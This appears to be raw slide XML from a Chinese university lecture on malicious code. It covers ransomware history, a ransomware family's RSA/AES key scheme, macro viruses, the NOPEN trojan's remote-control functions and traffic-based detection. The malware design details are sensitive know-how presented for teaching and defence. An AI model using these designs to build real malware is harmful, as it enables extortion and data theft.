              <a:t>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目前已知最早的勒索病毒雏形诞生于1989年，该木马程序以“艾滋病信息引导盘”的形式进入系统，采用替换DOS系统文件的方式，实现开机记数。一旦系统启动次数达到90次时，该木马将隐藏磁盘的多个目录，C盘的全部文件名也会被加密，从而导致系统无法启动。此时，屏幕显示信息，声称用户的软件许可已经过期，要求用户通过指定邮箱支付赎金以解锁系统。该病毒被称为艾滋病特洛伊木马或PC Cyborg病毒。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2006年出现的Redplus勒索木马是中国大陆首个勒索软件。该木马会隐藏用户文档和包裹文件，然后弹出窗口要求用户将赎金汇入指定银行账号。据国家计算机病毒应急处理中心统计，来自全国各地的该病毒及其变种的感染报告有581例。次年，出现的新型蠕虫病毒开始使用更复杂的RSA加密方案，同时密钥大小不断增加。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2013年，随着比特币市场的疯狂兴起，勒索赎金的支付方式也产生的很大变化。早期的勒索软件采用传统的邮寄方式接收赎金，会要求受害者向指定的邮箱邮寄一定数量的赎金，或者向指定号码发送可以产生高额费用的短信。直到比特币这种虚拟货币出现，为勒索软件提供了更为隐蔽的赎金获取方式。2013年以来，勒索软件逐渐采用了比特币为代表的虚拟货币支付方式，不可溯源的赎金渠道加速了勒索软件的泛滥。</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https://view.inews.qq.com/a/20220908A039MN00</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https://bbs.360.cn/thread-15858154-1-1.html</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https://zhuanlan.zhihu.com/p/127928680</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Q：是否可以通过数据恢复的方法恢复文件？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A：少部分勒索病毒加密文件时，没有覆盖原文件，而仅仅使用删除的方法，所以有机会通过数据恢复软件找回部分文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>B：由于很多分勒索病毒加密文件时为了保证效率，只加密文件头部固定大小的数据。所以部分数据库有机会通过数据修复的方法进行恢复。其他文件通过该方法恢复的机会很小。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>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https://www.cnblogs.com/ltyandy/p/11527803.html</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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先解码出一个内置的RSA公钥(hacker_rsa_pub)，同时对每个受害用户，使用RSA生成公私钥（user_rsa_pub和user_rsa_pri），其中生成的密钥信息使用内置的RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>公钥(hacker_rsa_Public)进行加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后，做为用户ID。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>遍历系统文件，对符合加密要求的文件进行加密。对每个文件，通过CoCreateGuid生成一个唯一标识符，并由该唯一标识符最终生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AES密钥(记为file_aes_key)，对文件进行加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在加密文件的过程中，该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>唯一标识符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会通过RSA公钥 (user_rsa_pub) 加密后保存到文件中。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑客在收到赎金、用户ID和文件后，通过自己的私钥(hacker_rsa_pri)解密用户ID,可以得到user_rsa_pri，使用user_rsa_pri解密文件，就可以得到文件的file_aes_key，进而可以通过AES算法解密出原始文件。</a:t>
            </a:r>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https://noransom.kaspersky.com/zh/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>社区</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://bbs.360.cn/forum-7592-1.html</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http://www.chinaaet.com/article/3000150896</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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>宏病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：寄存在文档或模板的宏中的计算机病毒，一旦被执行，就转移到计算机上，并驻留在Normal模板上，导致文件删除、修改、传输泄露等。</a:t>
            </a:r>
          </a:p>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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</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http://www.chinaaet.com/article/3000150896</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https://new.qq.com/rain/a/20220315A0AKJA00.html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192000" cy="5929161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1722755" y="0"/>
            <a:ext cx="10469245" cy="61125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4" name="直接连接符 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871508" y="582444"/>
            <a:ext cx="0" cy="505609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5.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 name="椭圆 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9629643" y="304780"/>
            <a:ext cx="2038123" cy="1999192"/>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a:glow rad="63500">
              <a:schemeClr val="accent1">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="149987" dist="250190" dir="8460000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="28000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="50000" endA="295" endPos="92000" dist="101600" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="obliqueBottomLeft"/>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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426453" y="3653959"/>
            <a:ext cx="5184576" cy="1413400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3735" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>杭州电子科技大学</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3735" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>陈黎丽</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="椭圆 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485169" y="3926627"/>
            <a:ext cx="1536171" cy="1516705"/>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glow rad="63500">
              <a:schemeClr val="accent1">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="149987" dist="250190" dir="8460000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="28000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="31750"/>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="obliqueBottomLeft"/>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文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708456" y="1671676"/>
            <a:ext cx="8775510" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2651727" y="2608956"/>
            <a:ext cx="0" cy="4104456"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:tint val="66000"/>
                    <a:satMod val="160000"/>
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent1">
                    <a:tint val="23500"/>
                    <a:satMod val="160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“NOPEN”远控木马功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="1391285"/>
            <a:ext cx="10737215" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“NOPEN”木马工具包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“noclient”和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“noserver”两部分，客户端会采取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发送激活包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的方式与服务端建立连接，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RSA算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>法进行秘钥协商，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RC6算法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密通信流量。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在主控端和受控端之间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>建立隐蔽加密信道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，攻击者可通过向目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发送远程指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，实现远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取目标主机环境信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传/下载/创建/修改/删除文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>远程执行命令、网络流量代理转发、内网扫描、窃取电子邮件信息、自毁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等恶意功能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“NOPEN”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马工具主要用于在受害单位内网中执行各类攻击指令，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>结合其他取情、嗅探工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>级联窃取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>核心数据。</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a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>行为</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3966845" y="365125"/>
            <a:ext cx="7721600" cy="635381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10435" y="259715"/>
            <a:ext cx="8755380" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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动态分析：流量数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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a:t>
            </a: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流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
            <a:endPar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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726440" y="5654675"/>
            <a:ext cx="9694545" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>智能分析提取特征：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KDDCUP99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据集特征、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CICflowmeter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>工具提取特征</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="图片 102"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="362585" y="1822450"/>
            <a:ext cx="5067935" cy="3212465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414655" y="1338580"/>
            <a:ext cx="1981835" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>抓包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6214745" y="1243330"/>
            <a:ext cx="3849370" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Microsoft Network Monitor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="图片 104"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6091238" y="3424238"/>
            <a:ext cx="9525" cy="9525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
